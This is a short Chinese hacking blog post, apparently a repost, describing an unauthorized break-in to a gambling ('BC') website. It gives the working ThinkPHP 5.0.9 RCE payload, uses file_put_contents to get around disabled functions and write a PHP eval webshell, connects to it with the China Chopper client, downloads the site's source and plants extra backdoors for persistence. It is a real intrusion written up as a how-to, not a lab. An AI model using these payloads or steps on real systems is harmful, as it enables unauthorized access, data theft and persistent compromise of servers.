简单的BC站点getshell

更多黑客技能 公众号:暗网黑客

最近来了点任务,做BC站,以前没做过只能碰碰运气!

确定目标

主站:

图片

通过旁站:

图片

信息收集

通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

图片

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()
查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

图片

发现是php 5.4.45版本的,

直接尝试getshell:

在这里插入图片描述

发现system被禁用,尝试其他系统命令的也一样。

图片

查看phpinfo中desable_functions禁用了那些函数。

图片

想办法怎么绕过进行写马(此处卡了我半天)

最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,

想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。

再次感谢小伙伴!

图片

getshell

构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents(‘a.php’,’<?php eval($_POST[a])?>’)

图片

写入成功,利用菜刀连接。

图片

成功连接。

查看权限:

图片

发现启动了远程安全模式。

想要绕过,发现很多函数被禁用,占未成功。

下载源码:

图片

多部署一些后门,防止被删。

作者:Squirrels

转载自:https://xz.aliyun.com/t/9232
在这里插入图片描述

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值